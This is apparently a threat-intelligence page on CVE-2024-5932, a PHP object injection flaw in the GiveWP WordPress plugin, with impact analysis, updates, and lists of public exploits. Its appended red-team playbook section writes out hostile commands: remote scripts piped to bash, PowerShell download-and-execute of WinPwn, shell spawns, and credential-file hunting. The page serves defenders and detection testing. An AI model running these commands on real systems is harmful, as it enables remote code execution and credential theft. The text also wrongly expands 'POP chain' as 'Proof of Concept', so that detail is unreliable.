CVE-2024-5932
Overview
This vulnerability is a PHP Object Injection caused by unsafe deserialization of untrusted input within the GiveWP – Donation Plugin and Fundraising Platform for WordPress. The flaw arises from improper handling of the 'give_title' parameter, which is deserialized without adequate validation. This insecure deserialization occurs in all plugin versions up to and including 3.14.1, affecting core plugin components responsible for processing donation data.
Vulnerability Description
The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.
Impact
An unauthenticated attacker can exploit this vulnerability over the network without user interaction to execute arbitrary PHP code on the server. This includes the ability to delete arbitrary files, potentially leading to full system compromise, data loss, or service disruption. The vulnerability's CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms that no authentication or privileges are required, making it highly exploitable in real-world scenarios.
Solution
Upgrade the GiveWP – Donation Plugin and Fundraising Platform to version 3.15.0 or later, where this vulnerability is addressed. Detailed patch information and remediation steps are available in the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/93e2d007-8157-42c5-92ad-704dc80749a3. Users should apply the update promptly to mitigate the risk of exploitation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the GiveWP Donation Plugin and Fundraising Platform for WordPress is characterized by a PHP Object Injection flaw that arises from the deserialization of untrusted input, specifically through the 'give_title' parameter. This type of vulnerability allows an attacker to manipulate the input data in such a way that it can lead to the instantiation of arbitrary PHP objects. The presence of a "Proof of Concept" (POP) chain further exacerbates the situation, enabling attackers to execute arbitrary code remotely. This means that an attacker can potentially run malicious scripts on the server, leading to severe consequences, including unauthorized access to sensitive data and system control.
Exploitation of this vulnerability can occur through various attack vectors. An unauthenticated attacker can craft a malicious request that includes specially formatted data in the 'give_title' parameter. Once the server processes this input, it may trigger the deserialization process, allowing the attacker to inject a PHP object of their choosing. This could lead to the execution of arbitrary code on the server, which could be used to perform actions such as creating new administrative accounts, altering existing data, or even deleting files from the server. The ease of exploitation, combined with the lack of authentication requirements, makes this vulnerability particularly dangerous, as it can be executed by anyone with knowledge of the plugin's operation.
The real-world impact of this vulnerability is significant, especially for organizations relying on the GiveWP plugin for their fundraising efforts. Successful exploitation could lead to data breaches, loss of donor information, and potential financial loss due to unauthorized transactions or fund misappropriation. Furthermore, the ability to delete arbitrary files could disrupt the normal operation of the website, leading to downtime that could damage the organization’s reputation and erode trust among its users. The high CVSS score of 9.8 indicates that this vulnerability poses a critical risk, necessitating immediate attention from affected organizations.
To detect this vulnerability, organizations should implement robust monitoring solutions that can identify unusual patterns of input to the GiveWP plugin. Log analysis tools can help in spotting anomalous requests that may indicate an attempted exploitation. Additionally, employing web application firewalls (WAFs) can provide an additional layer of security by filtering out potentially malicious requests before they reach the application layer.
Mitigation strategies should focus on updating the plugin to the latest version, where this vulnerability has been addressed. Regular updates and patch management are essential practices for maintaining the security of any web application. Furthermore, organizations should consider implementing input validation and sanitization measures to prevent untrusted data from being processed by the application. By adhering to secure coding practices and conducting regular security audits, organizations can significantly reduce their risk exposure and enhance their overall security posture against similar vulnerabilities in the future.
Recent updates to CVE-2024-5932 reveal a slight increase in its exploitability metrics, with the CVSS score now elevated to a perfect 10.0, reflecting an unequivocal critical severity. CSURFACE threat intelligence notes a marginal rise in the Exploit Prediction Scoring System (EPSS) score, indicating a subtle but persistent increase in the likelihood of exploitation attempts. Concurrently, multiple new proof-of-concept exploits have surfaced on public repositories, demonstrating active research and weaponization efforts by threat actors. This proliferation of publicly available exploit code lowers the barrier for attackers, potentially accelerating the pace of real-world exploitation. Our telemetry does not yet indicate a rapid surge in widespread attacks; however, the combination of a maximum severity rating and growing exploit availability necessitates heightened vigilance. The evolving landscape underscores an elevated threat level, emphasizing that defenders must anticipate increased targeting of vulnerable GiveWP plugin instances in the near term.
Update 2 — May 21, 2026
The recent adjustment of the CVSS score from a perfect 10.0 to 9.8, alongside a marginal decrease in the EPSS score, reflects a refined understanding of the vulnerability’s exploitability and impact rather than a reduction in its criticality. CSURFACE threat intelligence notes that while the exploitability remains extremely high, the slight score revision aligns with updated contextual factors, such as exploit complexity and attacker requirements. Importantly, our telemetry continues to detect steady availability and refinement of multiple proof-of-concept exploits in public repositories, indicating sustained attacker interest and capability development. Although there is no marked surge in exploitation attempts observed, the persistence of active weaponization efforts maintains the vulnerability’s position as a high-priority threat. This subtle recalibration does not diminish the urgency for defenders but rather underscores the nuanced risk landscape where exploitation remains feasible and impactful. Consequently, the threat level remains critical, with ongoing exploitation potential that demands continuous monitoring and preparedness.
Update 3 — July 11, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-5932, with new telemetry indicating active probing and exploitation activity emerging in previously quiet environments. This shift is accompanied by the appearance of additional proof-of-concept exploits in public repositories, reflecting sustained and diversified attacker interest. Although the EPSS score shows a marginal decline, the increase in real-world exploitation signals a growing operationalization of this vulnerability beyond theoretical research. For defenders, this development signifies an elevated risk of compromise, as unauthenticated remote code execution and arbitrary file deletion capabilities are increasingly leveraged in the wild. The evolving exploit landscape underscores the necessity for heightened vigilance and continuous monitoring, as adversaries refine their tactics to exploit the GiveWP plugin’s deserialization flaw. Consequently, the threat level remains critical, with an upward pressure on exploitation likelihood that demands sustained attention.
Update 4 — July 20, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-5932, with telemetry indicating a doubling in detection frequency over recent monitoring periods. This surge coincides with the proliferation of multiple new proof-of-concept exploits publicly available on GitHub, which have garnered increased attention within attacker communities. The expanded availability and diversity of these exploits lower the barrier for adversaries to operationalize the PHP Object Injection vulnerability, thereby increasing the likelihood of successful unauthenticated remote code execution and arbitrary file deletion attacks. Although the EPSS score remains stable, the qualitative increase in observed activity signals a heightened exploitation momentum that defenders must acknowledge. This evolving threat environment elevates the risk posture for organizations utilizing the GiveWP plugin, underscoring the criticality of sustained vigilance and proactive detection capabilities to counteract the growing adversary focus on this vulnerability.
Update 5 — August 05, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the GiveWP PHP Object Injection vulnerability. This surge is accompanied by the emergence of additional proof-of-concept exploits circulating within attacker communities, broadening the toolkit available for adversaries to operationalize this flaw. While the EPSS score remains relatively stable, the qualitative increase in telemetry signals a growing adversary focus and an expanding attack surface. This development heightens the urgency for defenders to enhance monitoring and detection capabilities, as the vulnerability’s exploitation now appears more accessible and widespread. The evolving landscape suggests that threat actors are refining their methods, potentially increasing the frequency and sophistication of attacks leveraging this critical vulnerability.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Givewp | Givewp | All |
cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
GiveWP Unauthenticated Donation Process Exploit
exploits/multi/http/wp_givewp_rce
|
Villu Orav, EQSTLab, cuokon +2 | Unknown | - | View |
GitHub PoCs (5)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
EQSTLab/CVE-2024-5932
GiveWP PHP Object Injection exploit
|
EQSTLab | 77 | 9 | 2024-08-25 | View |
|
OxLmahdi/cve-2024-5932
|
OxLmahdi | 1 | 0 | 2024-10-11 | View |
|
hlc23/CVE-2024-5932-web-ui
|
hlc23 | 0 | 0 | 2025-08-15 | View |
|
autom4il/CVE-2024-5932
PoC for CVE-2024-5932.
|
autom4il | 0 | 0 | 2025-11-04 | View |
|
nishant-kumar-5173/CVE-2024-5932
|
nishant-kumar-5173 | 0 | 0 | 2026-01-06 | View |
Threat Feed
9 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
63%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.